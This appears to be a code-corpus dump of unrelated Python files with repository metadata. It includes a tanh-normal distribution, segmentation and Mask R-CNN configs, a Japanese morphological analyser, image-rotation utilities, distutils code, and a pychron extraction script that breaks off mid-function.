def __init__(self, normal_mean, normal_std, epsilon=1e-6):
"""
:param normal_mean: Mean of the normal distribution
:param normal_std: Std of the normal distribution
:param epsilon: Numerical stability epsilon when computing log-prob.
"""
self.normal_mean = normal_mean
self.normal_std = normal_std
self.normal = MultivariateDiagonalNormal(normal_mean, normal_std)
self.epsilon = epsilon
def sample_n(self, n, return_pre_tanh_value=False):
z = self.normal.sample_n(n)
if return_pre_tanh_value:
return torch.tanh(z), z
else:
return torch.tanh(z)
def _log_prob_from_pre_tanh(self, pre_tanh_value):
"""
Adapted from
https://github.com/tensorflow/probability/blob/master/tensorflow_probability/python/bijectors/tanh.py#L73
This formula is mathematically equivalent to log(1 - tanh(x)^2).
Derivation:
log(1 - tanh(x)^2)
= log(sech(x)^2)
= 2 * log(sech(x))
= 2 * log(2e^-x / (e^-2x + 1))
= 2 * (log(2) - x - log(e^-2x + 1))
= 2 * (log(2) - x - softplus(-2x))
:param value: some value, x
:param pre_tanh_value: arctanh(x)
:return:
"""
log_prob = self.normal.log_prob(pre_tanh_value)
correction = - 2. * (
ptu.from_numpy(np.log([2.]))
- pre_tanh_value
- torch.nn.functional.softplus(-2. * pre_tanh_value)
).sum(dim=1)
return log_prob + correction
def log_prob(self, value, pre_tanh_value=None):
if pre_tanh_value is None:
# errors or instability at values near 1
value = torch.clamp(value, -0.999999, 0.999999)
pre_tanh_value = torch.log(1+value) / 2 - torch.log(1-value) / 2
return self._log_prob_from_pre_tanh(pre_tanh_value)
def rsample_with_pretanh(self):
z = (
self.normal_mean +
self.normal_std *
MultivariateDiagonalNormal(
ptu.zeros(self.normal_mean.size()),
ptu.ones(self.normal_std.size())
).sample()
)
return torch.tanh(z), z
def sample(self):
"""
Gradients will and should *not* pass through this operation.
See https://github.com/pytorch/pytorch/issues/4620 for discussion.
"""
value, pre_tanh_value = self.rsample_with_pretanh()
return value.detach()
def rsample(self):
"""
Sampling in the reparameterization case.
"""
value, pre_tanh_value = self.rsample_with_pretanh()
return value
def sample_and_logprob(self):
value, pre_tanh_value = self.rsample_with_pretanh()
value, pre_tanh_value = value.detach(), pre_tanh_value.detach()
log_p = self.log_prob(value, pre_tanh_value)
return value, log_p
def rsample_and_logprob(self):
value, pre_tanh_value = self.rsample_with_pretanh()
log_p = self.log_prob(value, pre_tanh_value)
return value, log_p
@property
def mean(self):
return torch.tanh(self.normal_mean)
def get_diagnostics(self):
stats = OrderedDict()
stats.update(create_stats_ordered_dict(
'mean',
ptu.get_numpy(self.mean),
))
stats.update(create_stats_ordered_dict(
'normal/std',
ptu.get_numpy(self.normal_std)
))
stats.update(create_stats_ordered_dict(
'normal/log_std',
ptu.get_numpy(torch.log(self.normal_std)),
))
return stats
| [
"karolhausman@google.com"
] | karolhausman@google.com |
4aa8d69e3fc68379c480897545f8d19475acb2d8 | febeffe6ab6aaa33e3a92e2dbbd75783a4e32606 | /ssseg/cfgs/ce2p/base_cfg.py | 53ab052f882aa2949da132381458f39250509ae2 | [
"MIT"
] | permissive | Junjun2016/sssegmentation | 7bbc5d53abee1e0cc88d5e989e4cff5760ffcd09 | bf7281b369e8d7fc2f8986caaeec3ec38a30c313 | refs/heads/main | 2023-02-04T22:09:13.921774 | 2020-12-23T06:28:56 | 2020-12-23T06:28:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,668 | py | '''base config for ce2p'''
# config for dataset
DATASET_CFG = {
'train': {
'type': '',
'set': 'train',
'rootdir': '',
'aug_opts': [('Resize', {'output_size': (2048, 512), 'keep_ratio': True, 'scale_range': (0.5, 2.0)}),
('RandomCrop', {'crop_size': (512, 512), 'one_category_max_ratio': 0.75}),
('RandomFlip', {'flip_prob': 0.5}),
('PhotoMetricDistortion', {}),
('Normalize', {'mean': [123.675, 116.28, 103.53], 'std': [58.395, 57.12, 57.375]}),
('ToTensor', {}),
('Padding', {'output_size': (512, 512), 'data_type': 'tensor'}),]
},
'test': {
'type': '',
'set': 'val',
'rootdir': '',
'aug_opts': [('Resize', {'output_size': (2048, 512), 'keep_ratio': True, 'scale_range': None}),
('Normalize', {'mean': [123.675, 116.28, 103.53], 'std': [58.395, 57.12, 57.375]}),
('ToTensor', {}),]
}
}
# config for dataloader
DATALOADER_CFG = {
'train': {
'type': ['nondistributed', 'distributed'][1],
'batch_size': 16,
'num_workers': 16,
'shuffle': True,
'pin_memory': True,
'drop_last': True,
},
'test': {
'type': ['nondistributed', 'distributed'][1],
'batch_size': 1,
'num_workers': 16,
'shuffle': False,
'pin_memory': True,
'drop_last': False,
}
}
# config for optimizer
OPTIMIZER_CFG = {
'type': 'sgd',
'sgd': {
'learning_rate': 0.01,
'momentum': 0.9,
'weight_decay': 5e-4,
},
'max_epochs': 0,
'params_rules': {},
'policy': {
'type': 'poly',
'opts': {'power': 0.9, 'max_iters': None, 'num_iters': None, 'num_epochs': None}
},
'adjust_period': ['iteration', 'epoch'][0],
}
# config for losses
LOSSES_CFG = {
'loss_cls_stage1': {
'celoss': {'scale_factor': 1.0, 'opts': {'ignore_index': 255, 'reduction': 'mean'}}
},
'loss_cls_stage2': {
'celoss': {'scale_factor': 1.0, 'opts': {'ignore_index': 255, 'reduction': 'mean'}}
},
'loss_edge': {
'celoss': {'scale_factor': 1.0, 'opts': {'ignore_index': 255, 'reduction': 'mean'}}
}
}
# config for model
MODEL_CFG = {
'type': 'ce2p',
'benchmark': True,
'num_classes': -1,
'align_corners': False,
'is_multi_gpus': True,
'distributed': {'is_on': True, 'backend': 'nccl'},
'norm_cfg': {'type': 'syncbatchnorm', 'opts': {}},
'act_cfg': {'type': 'leakyrelu', 'opts': {'negative_slope': 0.01, 'inplace': True}},
'backbone': {
'type': 'resnet101',
'series': 'resnet',
'pretrained': True,
'outstride': 16,
'is_use_stem': True
},
'ppm': {
'in_channels': 2048,
'out_channels': 512,
'pool_scales': [1, 2, 3, 6],
},
'epm': {
'in_channels_list': [256, 512, 1024],
'hidden_channels': 256,
'out_channels': 2
},
'shortcut': {
'in_channels': 256,
'out_channels': 48,
},
'decoder':{
'stage1': {
'in_channels': 560,
'out_channels': 512,
'dropout': 0,
},
'stage2': {
'in_channels': 1280,
'out_channels': 512,
'dropout': 0.1
},
},
}
# config for common
COMMON_CFG = {
'train': {
'backupdir': '',
'logfilepath': '',
'loginterval': 50,
'saveinterval': 1
},
'test': {
'backupdir': '',
'logfilepath': '',
'resultsavepath': ''
}
} | [
"1159254961@qq.com"
] | 1159254961@qq.com |
05d4e7398b6baf2c1f7de7b84f7a6e0e81cb0afb | d8fa0ed226e6dbc0f607961c8b711362942b120a | /maskrcnn_benchmark/modeling/roi_heads/pred_head/roi_pred_predictors.py | 61f4ef46ed49d5168e57a75390aabcbf51111053 | [] | no_license | ltnghia/video-maskrcnn | 70d003f038f82156ec9a8dca4ce1b8ea1190792c | b0bc8eb8b43a8b45335625525eba620b389ba591 | refs/heads/master | 2021-06-19T11:13:29.058747 | 2021-04-01T02:19:07 | 2021-04-01T02:19:07 | 199,971,172 | 8 | 4 | null | null | null | null | UTF-8 | Python | false | false | 3,052 | py | from maskrcnn_benchmark.modeling import registry
from torch import nn
import math
import torch
from maskrcnn_benchmark.modeling.make_layers import make_fc
@registry.ROI_PRED_PREDICTOR.register("FastRCNNPredictor")
class FastRCNNPredictor(nn.Module):
def __init__(self, cfg, in_channels):
super(FastRCNNPredictor, self).__init__()
assert in_channels is not None
num_inputs = in_channels
num_classes = cfg.MODEL.ROI_PRED_HEAD.NUM_CLASSES
self.avgpool = nn.AdaptiveAvgPool2d(1)
if num_classes > 0:
self.pred_score = make_fc(num_inputs, num_classes, use_gn=False)
# self.pred_score = nn.Linear(num_inputs, num_classes)
#
# nn.init.normal_(self.pred_score.weight, mean=0, std=0.01)
# nn.init.constant_(self.pred_score.bias, 0)
if cfg.MODEL.ROI_PRED_HEAD.USE_FOCAL_LOSS:
# bias_init for sigmoid focal loss
prior_prob = cfg.MODEL.ROI_PRED_HEAD.PRIOR_PROB
bias_value = -math.log((1 - prior_prob) / prior_prob)
nn.init.constant_(self.pred_score.bias, bias_value)
elif cfg.MODEL.ROI_PRED_HEAD.USE_CLASS_BALANCE_LOSS:
# bias_init for class balance loss
bias_value = -math.log(num_classes - 1)
nn.init.constant_(self.pred_score.bias, bias_value)
def forward(self, x):
x = self.avgpool(x)
x = x.view(x.size(0), -1)
pred_logit = self.pred_score(x)
return pred_logit
@registry.ROI_PRED_PREDICTOR.register("FPNPredictor")
class FPNPredictor(nn.Module):
def __init__(self, cfg, in_channels):
super(FPNPredictor, self).__init__()
num_classes = cfg.MODEL.ROI_PRED_HEAD.NUM_CLASSES
representation_size = in_channels
if num_classes > 0:
self.pred_score = make_fc(representation_size, num_classes, use_gn=False)
# self.pred_score = nn.Linear(representation_size, num_classes)
#
# nn.init.normal_(self.pred_score.weight, std=0.01)
# nn.init.constant_(self.pred_score.bias, 0)
if cfg.MODEL.ROI_PRED_HEAD.USE_FOCAL_LOSS:
# bias_init for sigmoid focal loss
prior_prob = cfg.MODEL.ROI_PRED_HEAD.PRIOR_PROB
bias_value = -math.log((1 - prior_prob) / prior_prob)
nn.init.constant_(self.pred_score.bias, bias_value)
elif cfg.MODEL.ROI_PRED_HEAD.USE_CLASS_BALANCE_LOSS:
# bias_init for class balance loss
bias_value = -math.log(num_classes - 1)
nn.init.constant_(self.pred_score.bias, bias_value)
def forward(self, x):
if x.ndimension() == 4:
assert list(x.shape[2:]) == [1, 1]
x = x.view(x.size(0), -1)
scores = self.pred_score(x)
return scores
def make_roi_pred_predictor(cfg, in_channels):
func = registry.ROI_PRED_PREDICTOR[cfg.MODEL.ROI_PRED_HEAD.PREDICTOR]
return func(cfg, in_channels)
| [
"trungnghiadk@gmail.com"
] | trungnghiadk@gmail.com |
fdc61ea92d64ff7e6860e3bbbd86c25e0cf2f2b3 | 44e85fa836a4099478a1c17f920cbd9f8b862ccb | /pos_language_model/morph_analyzer_single_counts_main.py | 57721f417c8fff33874a256f2f433158b4fa7c48 | [] | no_license | yukitomo/jp_robust_morphame_analysis | 7da9c4fdb3a743704d2e5f0acfb1a177c031230e | 6ca8b22a08003da7ce32201f9fe7968b92889643 | refs/heads/master | 2021-01-25T07:28:47.093365 | 2015-04-20T23:51:46 | 2015-04-20T23:51:46 | 27,806,235 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,823 | py | #!/usr/bin/python
#-*-coding:utf-8-*-
#2015-01-31 Yuki Tomo
import pickle
import math
import jctconv
import string
import sys
from collections import defaultdict
from make_dict_obj import Morph
from morph_analizer_counts import *
def main():
"""
posid_unigram_freq : 品詞の頻度
posid_bigram_freq : 品詞バイグラムの頻度
posid_word_freq : 品詞と単語の組み合わせの頻度
初期値
P(c_i|c_i-1) = freq(c_i|c_i-1) / freq(c_i-1)
P(v|c) = freq(v|c) / freq(c)
誤り化初期値 0.01
P(w|v) = 0.01
P(v|v) = 0.99
v → w : の展開するパターンを初期値として持っておく。
freq(w|v) : mecab辞書の読みから頻度0のvalue値として持っておく
学習の流れ
1. mecabで解析しカウントした頻度(freq_d)の読み込み
freq(c)_d, freq(v)_d
freq(c_i|c_i-1)_d, freq(v|c)_d
2.確率値の計算(あらかじめ計算しておく)
P(c_i|c_i-1), P(v|c)
3.現在のパラメータで誤り文を解析し、頻度を更新(freq_e)
freq(c)_e, freq(v)_e
freq(c_i|c_i-1)_e, freq(v|c)_e
freq(w|v)_e
4.確率値の再計算 (カウント数が変化した部分[分母が更新されたもの]だけ変更)
P(c_i|c_i-1), P(v|c)
P(w|v)
5. 3,4を繰り返す
input : 大量の日本語誤り文が格納されたファイル
"""
#--------------------------初期設定------------------------------------
#品詞id, 読みの辞書の読み込み
dict_dir = "/Users/yukitomo/Research/jp_robust_morphame_analysis/data/mecab-ipadic-2.7.0-20070801-utf8/"
pkl_dir = "/Users/yukitomo/Research/jp_robust_morphame_analysis/pkl_data/"
id_def = load_2colums(open(dict_dir + "left-id.def","r")," ") #mecabはr,l同じID
read_pron_dic = pickle.load(open(pkl_dir + "ipadic_read_pron_dict.pkl", "r"))
#1.初期頻度_dの読み込み
#毎日新聞
pkl_dir = "/Users/yukitomo/Research/jp_robust_morphame_analysis/pkl_data/"
c_freq_d = pickle.load(open(pkl_dir + "mainichi_posid_unigram_counts.pkl","r")) #freq(c)
cc_freq_d = pickle.load(open(pkl_dir + "mainichi_posid_bigram_counts.pkl","r")) #freq(c_i|c_i-1)
vc_freq_d = pickle.load(open(pkl_dir + "mainichi_posid_word_counts.pkl","r")) #freq(v|c)
#for pos, v_dict in vc_freq_d.items():
# for v, freq in v_dict.items():
# print pos, v, freq
#for pos, freq in c_freq_d.items():
# print pos, freq
#dict check
#print cc_freq_d
#for k1, v1 in cc_freq_d.items():
# for k2, v2 in v1.items():
# if k1 == "B":
# print k1,k2,v2
#print vc_freq_d
#w_v_freq_d : 存在しないがとりあえず格納
v_freq_d = {}
wv_freq_d = defaultdict(dict)
#Freq クラスに格納 初期頻度freq_d
freq_d = Freq(c_freq_d, cc_freq_d, vc_freq_d, wv_freq_d, v_freq_d)
#Eステップで更新する頻度の初期化 freq_e
freq_e = Freq(defaultdict(int), defaultdict(dict), defaultdict(dict), defaultdict(dict), defaultdict(int))
#2.初期頻度_dから確率値の計算をし、コスト(対数)に変換
cc_cost_e = freq_d.calc_cost("cc", 10)
vc_cost_e = freq_d.calc_cost("vc", 10)
wv_cost_e = freq_d.calc_cost("wv", 10)
#Costオブジェクトに格納
cost_dict = Cost(cc_cost_e, vc_cost_e, wv_cost_e)
#------------------初期値でのデコード例----------------------------------
"""
#文の入力
#input_sent = raw_input('input a sentence\n')
input_sent = "ごはんをたべる。"
#ラティスの生成
lm = Lattice_Maker(cost_dict.vc, read_pron_dic, cost_dict.wv, cost_dict.cc, id_def)
lattice = lm.create_lattice(input_sent)
#pickle.dump(lattice, open(pkl_dir + "lattice_gohanwotaberu.pkl","w"))
#ビタビによる最適な系列の決定
best_sequence = lm.viterbi(lattice)
#最適系列の出力
lm.show_best_sequence(best_sequence)
#最適系列から得られた頻度
increase_counts = lm.return_best_sequence_counts(best_sequence)
#コストの更新
print increase_counts.show_info()
[cost_dict, freq_e] = update_cost_freq(cost_dict, freq_e, freq_d, increase_counts)
cost_dict.show_info()
"""
#-----------------------------------------------------------------------
#-------------------学習----------------------------------------
#ファイルの入力
input_sent = raw_input('input\n')
print "input_sent : ", input_sent
#updateされたコストをモデルに組み込む
lm = Lattice_Maker(cost_dict, read_pron_dic, id_def)
#ラティスの生成
lattice = lm.create_lattice(input_sent)
#ビタビによる最適な系列の決定
best_sequence = lm.viterbi(lattice)
#最適系列の出力
lm.show_best_sequence(best_sequence)
#最適系列から得られた頻度
increase_counts = lm.return_best_sequence_counts(best_sequence)
#コストのアップデート
[cost_dict, freq_e] = update_cost_freq(cost_dict, freq_e, freq_d, increase_counts)
if __name__ == '__main__':
main() | [
"over.the.tr0ouble@gmail.com"
] | over.the.tr0ouble@gmail.com |
91e40c70561c19a95bdf6e85872cc990ed29743d | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02762/s492187443.py | d50e3beeefcb45621883846f22b51342ddd97ea9 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,422 | py | import collections
class UnionFind:
def __init__(self, N):
self.parent = [i for i in range(N)]
self.rank = [0]*N
self.count = 0
def root(self, a):
if self.parent[a]==a:
return a
else:
self.parent[a]=self.root(self.parent[a])
return self.parent[a]
def size(x):
return -par[root(x)]
def is_same(self, a, b):
return self.root(a)==self.root(b)
def unite(self, a, b):
ra = self.root(a)
rb = self.root(b)
if ra == rb: return
if self.rank[ra] < self.rank[rb]:
self.parent[ra] = rb
else:
self.parent[rb] = ra
if self.rank[ra] == self.rank[rb]: self.rank[ra] += 1
self.count += 1
def main():
n,m,k=map(int, input().split())
friend = [0]*n
fr = UnionFind(n)
blocklist = [0]*n
for i in range(m):
a,b = map(int, input().split())
fr.unite(a-1,b-1)
friend[a-1]+=1
friend[b-1]+=1
for i in range(k):
c,d=map(int, input().split())
if(fr.root(c-1)==fr.root(d-1)):
blocklist[c-1]+=1
blocklist[d-1]+=1
res = []
dd = collections.defaultdict(int)
for i in range(n):
dd[fr.root(i)]+=1
for i in range(n):
res.append(dd[fr.root(i)]- blocklist[i] - friend[i]-1)
print(*res)
if __name__ == '__main__':
main()
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
2c36910a906c4c9ba81c09a28d3c666e18ad3e0c | b22e40b12e198af858dbf71cdb85f459314c0e37 | /image_utils.py | c721a20228730f3744ad52aa2f9ebe1448380216 | [] | no_license | gauenk/python_modules | 8b40626b566e4fdd7db6fc830255ed3daa34b039 | 632d4813a8e182c74b950d98f3f5b98732d8d6ad | refs/heads/master | 2020-12-15T16:34:42.542568 | 2020-06-09T15:47:43 | 2020-06-09T15:47:43 | 235,180,107 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,529 | py | import numpy as np
import cv2
def overflowOnly(coordinate,rows,cols):
if 0 > coordinate[0]: coordinate[0] = np.abs(coordinate[0])
elif rows < coordinate[0]: coordinate[0] = rows - coordinate[0]
if 0 > coordinate[1]: coordinate[1] = np.abs(coordinate[1])
elif cols < coordinate[1]: coordinate[1] = cols - coordinate[1]
def zeroInTheRegion(coordinate,rows,cols):
if 0 <= coordinate[0] and coordinate[0] <= rows: coordinate[0] = 0
if 0 <= coordinate[1] and coordinate[1] <= cols: coordinate[1] = 0
def correctTranslatedIndex(coordinate,rows,cols):
zeroInTheRegion(coordinate,rows,cols)
overflowOnly(coordinate,rows,cols)
def getRotationScale(M,rows,cols):
a = np.array([cols,0,1])
b = np.array([0,0,1])
ta = np.matmul(M,a)
tb = np.matmul(M,b)
correctTranslatedIndex(ta,rows,cols)
correctTranslatedIndex(tb,rows,cols)
scale_a_0 = rows / ( 2. * np.abs(ta[0]) + rows )
scale_a_1 = rows / ( 2. * np.abs(ta[1]) + rows )
scale_b_0 = cols / ( 2. * np.abs(tb[0]) + cols )
scale_b_1 = cols / ( 2. * np.abs(tb[1]) + cols )
scale_list = [scale_a_0,scale_a_1,scale_b_0,scale_b_1]
scale = np.min([scale_a_0,scale_a_1,scale_b_0,scale_b_1])
return scale
def getRotationInfo(angle,cols,rows):
rotationMat = cv2.getRotationMatrix2D((cols/2,rows/2),angle,1.0)
scale = getRotationScale(rotationMat,rows,cols)
rotationMat = cv2.getRotationMatrix2D((cols/2,rows/2),angle,scale)
return rotationMat,scale
def rotateImage(img,angle):
# print('angle',angle)
if angle is False:
return img,None
im_shape = img.shape
rows,cols = img.shape[:2]
rotationMat, scale = getRotationInfo(angle,cols,rows)
img = cv2.warpAffine(img,rotationMat,(cols,rows),scale)
rotateInfo = [angle,cols,rows,im_shape]
return img,rotateInfo
def rotateImageList(imageList,angle):
rot_image_list = []
if type(imageList) is list:
for image_index,image in enumerate(imageList):
rot_image,_ = rotateImage(image,angle)
rot_image_list.append(rot_image)
else:
is_single_bw_image_bool = (len(imageList.shape) == 2)
is_single_color_image_bool = (len(imageList.shape) == 3) and (imageList.shape[2] == 3)
if is_single_bw_image_bool or is_single_color_image_bool:
print("actually single image; not list")
rot_image,_ = rotateImage(imageList,angle)
return rot_image
for image_index in range(imageList.shape[0]):
image = np.squeeze(imageList[image_index,...])
rot_image,_ = rotateImage(image,angle)
rot_image_list.append(rot_image)
return rot_image_list
def saveImageList(imageList,prefix_name="save_image",label_string=None):
if type(imageList) is list:
for image_index,image in enumerate(imageList):
if label_string is not None:
filename = "{}_{}_{}.png".format(prefix_name,image_index,label_string[image_index])
else:
filename = "{}_{}.png".format(prefix_name,image_index)
cv2.imwrite(filename,image)
else:
for image_index in range(imageList.shape[0]):
image = np.squeeze(imageList[image_index])
if label_string is not None:
filename = "{}_{}_{}.png".format(prefix_name,image_index,label_string[image_index])
else:
filename = "{}_{}.png".format(prefix_name,image_index)
cv2.imwrite(filename,image)
| [
"kent.gauen@gmail.com"
] | kent.gauen@gmail.com |
afb8c441118da9ce0c7ceb12fc640da170000a66 | d9e8b7d5c468b38cdf18cece9dff12ad1188a71b | /DiscussionForum/Postapp/views.py | 7cf20fbdb26a0e0028127630d851e46d326f9dac | [] | no_license | Ruchika-Munde/Django_Task | f14e0497a4f8045a68dbe58bbd772abf606369d3 | 7fa549842a544527b9f78cbfcf52c26dde31463c | refs/heads/master | 2022-12-16T17:53:12.577323 | 2020-09-09T07:34:43 | 2020-09-09T07:34:43 | 294,036,604 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,502 | py | from django.shortcuts import render,redirect
from Postapp.forms import Addpostform
from Postapp.models import Post
from django.views import View
from Userapp.models import User
from Commentapp.forms import commentform
from Postapp.decorator import user_login
# Create your views here.
#for add post
class base(View):
def get(self,request):
return render(request,'base.html')
class Addpost(View):
@user_login
def get(self,request):
pform=Addpostform()
return render (request,'post.html',{'pform':pform})
def post(self,request,*args,**kwargs):
pform=Addpostform(request.POST,request.FILES)
if(pform.is_valid()):
post=Post(title=pform.cleaned_data['title'],description=pform.cleaned_data['description'],ptag=pform.cleaned_data['ptag'])
if(request.FILES):
post.fileupload = pform.cleaned_data['fileupload']
uid=request.session.get('uid')
print(uid)
user_obj=User.objects.get(pk=uid)
post.postbyuser=user_obj
post.save()
return redirect('/postapp/showpost/')
# for show post
class posttitle(View):
def get(self,request):
obj=Post.objects.all()
return render(request,'home.html',{'obj':obj})
# show post details
class postdetails(View):
def get(self,request,id):
pobj=Post.objects.get(pk=id)
form = commentform()
return render(request,'postdetails.html',{'pobj':pobj,'form':form})
| [
"ruchamunde@gmail.com"
] | ruchamunde@gmail.com |
878c2b75897dabb57c8c8b8f229f2b4c3c2fda3e | 7823d31688879b2d4dcfd2e3c11fb2c862f35a23 | /AlexNet/cifar/__init__.py | 0e34a0daf85c1391567619a425f9e1606cb30503 | [] | no_license | FMsunyh/dlfive | 7637631f54520673e4ec417b3c02b5334ecdf026 | ffae48aac5ece4de5ff9afccc69b093a72e09637 | refs/heads/master | 2021-09-19T05:59:51.040214 | 2018-07-24T06:29:40 | 2018-07-24T06:29:40 | 108,929,499 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 204 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 11/30/2017 10:43 AM
# @Author : sunyonghai
# @File : __init__.py
# @Software: BG_AI
# ========================================================= | [
"fmsunyh@gmail.com"
] | fmsunyh@gmail.com |
cdb285fcbd3bf0997b05842fdf2761137a12425e | cb9a9263e077111a9b2f6fe420438153a2f3f952 | /empiricaldist/__init__.py | 4323a53ba66a6117c76a3c43d918496d41084317 | [
"BSD-3-Clause"
] | permissive | AllenDowney/empiricaldist | 706cab3f556f97d1e3dd5c858d93d8422e799399 | 3df89ba1314a90a6e5515ec6a77dba4d02fa1438 | refs/heads/master | 2023-06-20T19:33:25.551749 | 2023-06-11T00:11:41 | 2023-06-11T00:11:41 | 179,715,194 | 128 | 30 | BSD-3-Clause | 2022-09-02T23:22:05 | 2019-04-05T16:13:21 | Jupyter Notebook | UTF-8 | Python | false | false | 29 | py | from .empiricaldist import *
| [
"downey@allendowney.com"
] | downey@allendowney.com |
497130a66a1d5cb4e762cfd18224838b0a235273 | 3dc647cd07a7361ed401e40d2b7cce8c826c8f6c | /Lib/distutils/command/install_headers.py | 9bb0b18dc0d809dbc03d9ca355818b3bb0af573b | [
"CC-BY-4.0",
"MIT",
"Python-2.0"
] | permissive | RustPython/RustPython | 5ddce4a9848b9de8c041ffd2634f83c0105d3f39 | b864e5da1f18897fc884180b7093df5aa170024f | refs/heads/main | 2023-09-04T12:38:29.458699 | 2023-09-03T12:33:42 | 2023-09-03T12:33:42 | 135,201,145 | 15,815 | 1,302 | MIT | 2023-09-14T08:11:45 | 2018-05-28T19:27:01 | Rust | UTF-8 | Python | false | false | 1,298 | py | """distutils.command.install_headers
Implements the Distutils 'install_headers' command, to install C/C++ header
files to the Python include directory."""
from distutils.core import Command
# XXX force is never used
class install_headers(Command):
description = "install C/C++ header files"
user_options = [('install-dir=', 'd',
"directory to install header files to"),
('force', 'f',
"force installation (overwrite existing files)"),
]
boolean_options = ['force']
def initialize_options(self):
self.install_dir = None
self.force = 0
self.outfiles = []
def finalize_options(self):
self.set_undefined_options('install',
('install_headers', 'install_dir'),
('force', 'force'))
def run(self):
headers = self.distribution.headers
if not headers:
return
self.mkpath(self.install_dir)
for header in headers:
(out, _) = self.copy_file(header, self.install_dir)
self.outfiles.append(out)
def get_inputs(self):
return self.distribution.headers or []
def get_outputs(self):
return self.outfiles
| [
"33094578+coolreader18@users.noreply.github.com"
] | 33094578+coolreader18@users.noreply.github.com |
b7952897bfe878e35fb9ecdb2fdebc447c5a6b71 | 96c970ebacd9ade1493f4d01537005788b43a49b | /pychron/pyscripts/extraction_line_pyscript.py | 5f8cc3ba8a68016c0e3a052fa639ab93b6d1ecea | [
"Apache-2.0"
] | permissive | OSUPychron/pychron | d2da9051b68024200d0009de634da810ccef2a0d | fe0ba9daff9548fa8bebab26db66a1cefff7c1d6 | refs/heads/master | 2021-01-14T12:47:26.389887 | 2015-12-18T22:27:02 | 2015-12-18T22:27:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,857 | py | # ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from traits.api import List
# ============= standard library imports ========================
import time
import inspect
import re
# ============= local library imports ==========================
from pychron.core.ramper import Ramper
from pychron.external_pipette.protocol import IPipetteManager
from pychron.hardware.core.exceptions import TimeoutError
from pychron.hardware.core.i_core_device import ICoreDevice
from pychron.pyscripts.pyscript import verbose_skip, makeRegistry
from pychron.lasers.laser_managers.ilaser_manager import ILaserManager
from pychron.pyscripts.valve_pyscript import ValvePyScript
from pychron.pychron_constants import EXTRACTION_COLOR, LINE_STR
# ELPROTOCOL = 'pychron.extraction_line.extraction_line_manager.ExtractionLineManager'
COMPRE = re.compile(r'[A-Za-z]*')
# make a registry to hold all the commands exposed by ExtractionPyScript
# used when building the context
# see PyScript.get_context and get_command_register
command_register = makeRegistry()
class RecordingCTX(object):
def __init__(self, script, name):
self._script = script
self._name = name
def __enter__(self, *args, **kw):
self._script.start_video_recording(self._name)
def __exit__(self, *args, **kw):
self._script.stop_video_recording()
class ExtractionPyScript(ValvePyScript):
"""
The ExtractionPyScript is used to program the extraction and gettering of
sample gas.
"""
_resource_flag = None
info_color = EXTRACTION_COLOR
snapshots = List
_extraction_positions = List
def set_run_identifier(self, v):
self.setup_context(run_identifier=v)
def get_extraction_positions(self, clear=True):
"""
Returns a list of x,y,z tuples
each tuple represents where the extraction occurred
if clear is True (default) ``self._extraction_positions`` set to an empty list
:return: list of x,y,z tuples
:rtype: list of tuples
"""
ret = self._extraction_positions
if clear:
self._extraction_positions = []
return ret
def get_response_blob(self):
"""
Get the extraction device's response blob
:return: response blob. binary string representing time v measured output
:rtype: str
"""
return self._extraction_action([('get_response_blob', (), {})])
def get_output_blob(self):
"""
Get the extraction device's output blob
:return: output blob: binary string representing time v requested output
:rtype: str
"""
return self._extraction_action([('get_output_blob', (), {})])
def output_achieved(self):
"""
Return a formated string with the extraction "heating" results::
Requested Output= 100.000
Achieved Output= 99.012
:return: Formatted string with results
:rtype: str
"""
request = self.extract
ach = self._extraction_action([('get_achieved_output', (), {})])
try:
request = float(request)
except (ValueError, TypeError):
request = 0
try:
ach = float(ach)
except (ValueError, TypeError):
ach = 0
return ('Requested Output= {:0.3f}'.format(request),
'Achieved Output= {:0.3f}'.format(ach))
def get_command_register(self):
cm = super(ExtractionPyScript, self).get_command_register()
return command_register.commands.items() + cm
def set_default_context(self):
"""
provide default values for all the properties exposed in the script
"""
self.setup_context(analysis_type='',
position='',
pattern='',
extract_device='',
extract_value=0,
extract_units='',
tray='',
ramp_rate='',
ramp_duration=0,
duration=0,
cleanup=0,
beam_diameter=None,
run_identifier='default_runid')
# ===============================================================================
# commands
# ===============================================================================
@verbose_skip
@command_register
def wake(self):
self._extraction_action('wake')
self._manager_action('wake')
@verbose_skip
@command_register
def waitfor(self, func_or_tuple, start_message='', end_message='',
check_period=1, timeout=0):
"""
tuple format: (device_name, function_name, comparison)
comparison ::
x<10
10<x<20
callable can of form ``func() or func(ti) or func(ti, i)``
where ``ti`` is the current relative time (relative to start of waitfor) and ``i`` is a counter
:param func_or_tuple: wait for function to return True
:type func_or_tuple: callable, tuple
:param start_message: Message to display at start
:type start_message: str
:param end_message: Message to display at end
:type end_message: str
:param check_period: Delay between checks in seconds
:type check_period: int, float
:param timeout: Cancel waiting after ``timeout`` seconds
:type timeout: int, float
"""
include_time = False
include_time_and_count = False
if isinstance(func_or_tuple, tuple):
func = self._make_waitfor_func(*func_or_tuple)
else:
func = func_or_tuple
args = inspect.getargspec(func).args
if len(args) == 1:
include_time = True
elif len(args) == 2:
include_time_and_count = True
if not func:
self.debug('no waitfor function')
self.cancel()
self.console_info('waitfor started. {}'.format(start_message))
st = time.time()
i = 0
while 1:
